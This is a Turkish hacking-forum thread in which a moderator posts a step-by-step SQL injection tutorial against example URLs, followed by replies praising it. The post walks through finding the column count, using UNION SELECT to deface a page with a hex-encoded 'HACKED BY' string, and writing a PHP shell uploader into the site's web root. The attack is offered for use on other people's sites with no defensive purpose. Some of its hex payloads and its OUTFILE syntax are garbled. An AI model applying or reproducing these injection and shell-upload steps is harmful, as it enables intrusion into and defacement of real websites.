Welcome to Spyhackerz family! Log in or Sign up to join us

Sql Manuel Shell Upload [DEV KONU] //Anarchosa

Discussion in 'Hack Dökümanları - Hack Articles' started by Anarchosa, Aug 7, 2018.

  1. Anarchosa

    Anarchosa Moderator

    Katılım:Apr 24, 2018
    Mesajlar:
    595
    Uzmanlık Alanları
    Security
    Coder
    Linux
    Web Hacking
    Exploit
    SQL
    S.Eng
    Özel Mesaj Yolla
    Beyler Bu konumda sql açıklı sitelerde panele girmeden shell upload etmeyi anlatıcam. bu zamana kadar sql olayını sadece havij veya sqlmap'ten ibaret biliyordunuz.
    Yok işte sitenin admin panelini bulucaz.
    Ondan sonra md5i kırıcaz.
    Sitede sql açığı tarayacaz.
    Öyle yapıcaz böyle yapıcaz bilmem ne.

    Bunlara gerek yok.
    Tek gerekli olan şey sitede sql açığı olması.

    NOT: HER SİTEDE İŞE YARAMIYOR.

    örneğin hedef sitemiz;
    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım
    Bu olsun.

    İlk herkesin bildiği gibi (') işareti koyup hata verdirmemiz gerekir.
    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım'

    İşareti koyduk ve ekrana "AT LİNE 1" gibi bir hata geldi.

    Buralar herkesin bildiği şeyler.

    Şimdi bu hatayı fixlememiz gerekiyor. Bundan dolayı

    -- - veya -- + komutunu kullanabilirsiniz.
    Not: farklı komutlarda var araştırın.

    sitenin sonuna fix kodunu yazalım.
    Code:
    https://site.com/amk/index.php?id=1' -- + 
    Bu fix kodunu yazdığımız zaman ekrandaki "at line 6" hatası gidecektir.

    Şimdi sitede kaç kolon var bunu ölçeceğiz. Bunu ORDER+BY komutuyla yapıcaz.

    Code:
    https://site.com/amk/index.php?id=1'+ORDER+BY+1 -- + 
    şimdi diyorsunuz neden order by komutunun yanına 1 yazdık.
    Siz o sayıyı ekranda hata alana kadar yükselteceksiniz.

    Mesela ORDER+BY+5 e kadar yükselttiniz hata yok.
    Ama 6 yazdınız hata aldınız.
    Demektir ki sitede 5 kolon var.

    Şimdi kolon sayımızı bulduk. 5 kolon var şimdide bu 5 kolondan hangileri aktif halde hangileri iş yapar bunu görücez.

    Order by komutlarını falan url sonundan silin.

    Bu sefer kullanacağımız komut UNION+ALL+SELECT komutu.

    Bu komut sayesinde bulduğumuz 5 kolondan hangileri aktif ve işimize yarar onları bulucaz.


    Code:
    https://site.com/amk/index.php?id=1'+UNION+SELECT+1,2,3,4,5 -- + 
    Evet... Neden 5 e kadar yazdığımı tahmin edebiliyorsunuzdur. Çünkü 5 kolunumuz vardı.

    Enter tuşuna bastığınızda hiçbir sonuç almıyacaksınız.
    Sebebi ise id değerinin başına - koymanız gerekir.
    index.php?id=-1 olarak ayarlayacağız.

    Code:
    https://site.com/amk/index.php?id=-1'+UNION+SELECT+1,2,3,4,5 -- + 
    Tamam şimdi bu şekilde giriş yaptığınız zaman ekranda bazı numaralar göreceksiniz..

    Diyelim ekranda 3 ve 5 numarasını görüyorsunuz.

    Bu şu demek, 3 ve 5 aktif kolonlardır.
    Yani bizim işimize yarayacak olan kolonlar 3. Kolon ve 5. Kolondur.

    Dilerseniz siteyi şimdi deface edebilirsiniz ama devan ederseniz siteye shell sokabilirsiniz.

    Örneğin; deface mi etmek istiyorsunuz ?

    "HACKED BY NİCKİNİZ" bu yazıyı hex koduna çevirin.(internette hex encoder yazarsanız çıkar)
    Tamam mesela hex kodunux bu;
    62k6k2nd7271jrld27
    Şimdi bu kodun başına 0x koyun.
    0x62k6k2nd7271jrld27 bu şekil olacak şekilde 3. Kolon veya 5. Kolona yerleştirin.
    Ben 5. Kolona yerlestiricem.


    Code:
    https://site.com/amk/index.php?id=-1'+UNION+SELECT+1,2,3,4,0x62k6k2nd7271jrld27 -- + 

    Üstte gördüğünüz gibi 5. Kolona yerlestirmek istediğim için 5 sayısını silip onum yerine hex kodlarımı yapıstırdım.

    Şimdi böyle yaptınız ve Ekranda "HACKED BY NİCKİNİZ" yazıyor. Bu şekilde deface ettiniz.

    Peki ya shell upload etmek istersek ne yapıcaz ?


    Shell kodumuzu da hex koduna çeviricez ama shell kodları çok fazla karakter olduğu işin sıkıntı çıkarabilir.

    ShellUploader.php diye bir shell var az karakterden oluşturuyor ve bunun sayesinde shell upload edebiliorsun.

    Bu shell uploeder php nin kodlarını hex koda çevirin ve başına 0x koyarak boş bir kolona yerleştirin.
    Ama bitti mi ? -bitmedi

    Shelli nereye upload edeceğinizi bilmeniz lazım

    Bir sitede sql açığı varken yüksek ihtimalle /home/user/public_html/amk/index.php
    Gibi size yolu gösterir.

    Şimdi biz Shell upload etmek bide bize upload kodu lazım. OUTFILE INTO komutuyla upload edebiliriz.


    Code:
    https://site.com/amk/index.php?id=-1'+UNION+SELECT+1,2,3,4,0xoö72lsj27kejdı2ekdı72mdk OUTFILE INTO 
    '/home/user/public_html/amk/shelluploader.php' -- + 
    bu komutu yazarak shelluploader.php olarak dosyayı oluşturduk.

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım yazarak istediğinize kavuşabilirsiniz.

    @Mectruy seversin böyle konuları abi çee

     
  2. MKA7

    MKA7 Major

    Katılım:Jul 26, 2018
    Mesajlar:
    340
    Uzmanlık Alanları
    Mitnick
    Özel Mesaj Yolla
    Bu çocuğun imzası uzun, konusu uzun kesin boyuda uzundur aq (Eline sağlık yüreği büyük insan çee)
     
    Anarchosa likes this.
  3. Owner
    Owner
    Anarchosa

    Anarchosa Moderator

    Katılım:Apr 24, 2018
    Mesajlar:
    595
    Uzmanlık Alanları
    Security
    Coder
    Linux
    Web Hacking
    Exploit
    SQL
    S.Eng
    Özel Mesaj Yolla
    Teşekkürler reis boy 1,83 çok fazla değil ama çok da kısa değilim çee
     
  4. HackNology

    HackNology Kıdemli üye

    Katılım:Jun 5, 2017
    Mesajlar:
    865
    Uzmanlık Alanları
    Upload...
    Özel Mesaj Yolla
    Efsane bir konu efsane bir anlatım tarzı eline sağlık kardeşim
     
    Anarchosa likes this.
  5. Owner
    Owner
    Anarchosa

    Anarchosa Moderator

    Katılım:Apr 24, 2018
    Mesajlar:
    595
    Uzmanlık Alanları
    Security
    Coder
    Linux
    Web Hacking
    Exploit
    SQL
    S.Eng
    Özel Mesaj Yolla
    Teşekkür ederim reis anlatmaya çalıştık bişeyler işte.
    Yazmak 30 dakikamı aldı ama değdi sanırım çee tekrardan teşekkürler :p
     
  6. Mectruy

    Mectruy Owner

    Katılım:Aralık 1, 2015
    Mesajlar:
    2,299
    Uzmanlık Alanları
    Bilişim uzmanı
    Php & Mysql
    Özel Mesaj Yolla
    Güzel konu bilgi nerde olursa öğrenirim demiş tatalarımız çee
     
    Anarchosa likes this.
  7. Owner
    Owner
    Anarchosa

    Anarchosa Moderator

    Katılım:Apr 24, 2018
    Mesajlar:
    595
    Uzmanlık Alanları
    Security
    Coder
    Linux
    Web Hacking
    Exploit
    SQL
    S.Eng
    Özel Mesaj Yolla
    Bizi onurlandırdınız efendim ^_^ çee
     
  8. kernel-pan1c

    kernel-pan1c Üst Tabaka

    Katılım:Feb 6, 2017
    Mesajlar:
    61
    Özel Mesaj Yolla
    Eline sağlık
     
    Anarchosa likes this.
  9. Owner
    Owner
    Anarchosa

    Anarchosa Moderator

    Katılım:Apr 24, 2018
    Mesajlar:
    595
    Uzmanlık Alanları
    Security
    Coder
    Linux
    Web Hacking
    Exploit
    SQL
    S.Eng
    Özel Mesaj Yolla
    Teşekkürler dostum :)
     
  10. HardLaz

    HardLaz Kıdemli üye

    Katılım:Aralık 3, 2015
    Mesajlar:
    95
    Uzmanlık Alanları
    Emekliye Ayrılmış Hacker :D
    Özel Mesaj Yolla
    sağlam konu eyvallah reis
     
    Anarchosa likes this.
  11. βψƦ0lЗ$4

    βψƦ0lЗ$4 Major

    Katılım:Oct 29, 2017
    Mesajlar:
    466
    Uzmanlık Alanları
    PhysicalHack
    WebHack
    Phreaker
    I am *Hacktivist*
    Özel Mesaj Yolla
    Yakıyorsun ortalığı :)
     
    Anarchosa likes this.
  12. BoneLess

    BoneLess Major

    Katılım:May 6, 2018
    Mesajlar:
    381
    Uzmanlık Alanları
    root,bypass,exploits,Windows,sm,linux,python
    Özel Mesaj Yolla
    yeniler için yararlı emeğine sağlık ««« Sanalın Küçük Lezbiyeni ||||||||
     
    Anarchosa likes this.
  13. Owner
    Owner
    Anarchosa

    Anarchosa Moderator

    Katılım:Apr 24, 2018
    Mesajlar:
    595
    Uzmanlık Alanları
    Security
    Coder
    Linux
    Web Hacking
    Exploit
    SQL
    S.Eng
    Özel Mesaj Yolla
    Beyler sizi seviyorum <3 teşekkürler <3
     
    BoneLess likes this.
  14. βψƦ0lЗ$4

    βψƦ0lЗ$4 Major

    Katılım:Oct 29, 2017
    Mesajlar:
    466
    Uzmanlık Alanları
    PhysicalHack
    WebHack
    Phreaker
    I am *Hacktivist*
    Özel Mesaj Yolla
    ./yanlışlıkla atildi
     
    Anarchosa likes this.
Loading...

Bu sayfayı Paylaş